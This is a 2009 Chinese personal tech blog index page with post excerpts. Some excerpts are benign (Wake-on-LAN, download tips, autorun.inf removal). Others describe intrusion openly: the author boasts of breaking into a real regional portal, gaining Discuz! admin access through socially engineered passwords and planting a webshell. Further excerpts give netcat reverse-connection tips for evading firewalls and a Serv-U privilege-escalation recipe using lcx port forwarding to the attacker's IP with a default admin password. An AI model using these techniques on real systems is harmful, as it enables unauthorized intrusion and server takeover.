Discuz!的牛逼拿Webshell法,测试可行
作者:yezi 日期:2009年11月23日
无意中入侵了邢台某门户网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:目前通吃所有DZ版本。1. 随便选一模板文件,选
分类:技术文章/Article | 评论: 0 | 查看次数:
深入NC提权成功与失败的原因
作者:yezi 日期:2009年11月20日
不少人NC提权没有成功过。因为其中的原因是你没有降低权限。而导致了NC提权失败//////////////////须要注意的地方:1.反弹端口。/////////////////////////网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是。我建议看一下端口有没有8080端口。如果没有8080端口的话,要反弹,8080端口,这样被防火墙阻止的概率较小。//////
分类:技术文章/Article | 评论: 1 | 查看次数:
windows 7虚拟机无法上网问题
作者:yezi 日期:2009年11月18日

分类:技术文章/Article | 评论: 0 | 查看次数:
远程唤醒计算机
作者:yezi 日期:2009年11月17日
在一个网络中,我们实施远程维护、更新时,可能远端的计算机已经关闭,这样还得再找一个人将该计算机打开,这样才可以进行。其实现在很多的主板和网卡都支持远程唤醒功能,只要我们进行必要的设置,那么就可以实现远程唤醒我们的计算机。一、准备工作要想远程唤醒你的计算机,首先必须要主板的支持。现在我们就可以查阅主板说明书,找到网卡远程唤醒接头(WOL),然后将网卡使用专门的电源线与主板连接起来(如图1)
分类:技术文章/Article | 评论: 0 | 查看次数:
诚龙网维全自动PXE维护工具 2009.3.25更新
作者:yezi 日期:2009年11月15日

分类:软件下载/Downs | 评论: 0 | 查看次数:
盘点迅雷下载技巧 让下载更加雷厉风行
作者:yezi 日期:2009年11月7日
本文主要介绍四个迅雷下载常用的技巧,有的可能是大家平常使用的,有的是可能平常没有注意到的。希望对大家提高下载速度有所帮忙。方法一:1.不要把迅雷安装在系统分区:系统分区是Windows操作系统的“老巢”每执行一个任务,都要扫描此分区。迅雷默认安装是系统分区,安装时可以安装到其他分区,可以在一定层次上避免影响系统稳定性和提高迅雷的执行速度。同上,默认下载目录也不要指定在系统分
分类:技术文章/Article | 评论: 0 | 查看次数:
针对硬盘不能双击打开右键出现autoruan类似问题总
作者:yezi 日期:2009年11月7日
右键多了一个“自动播放”1."开始-运行",键入cmd后回车,进入DOS状态,输入C:后回车.继尔输入dir/a后车(没有参数a是看不到隐藏文件的.执行a是显示所有文件) 2.此时你会发现一个autorun.inf文件,再输入attrib autorun.inf -s -h -r 后回车,此操作
分类:技术文章/Article | 评论: 0 | 查看次数:
终端操作笔记
作者:yezi 日期:2009年11月3日
入侵提权技巧之serv-u 端口转发提权
作者:yezi 日期:2009年11月3日
1、在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改) 2、 在本机运行 lcx -listen 5000 21 (lcx地址要写对) 3、 打开本地的serv u 在IP上填入127.0.0.1 帐号:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码帐号有可能改 自己下文件看密码)&
分类:技术文章/Article | 评论: 0 | 查看次数: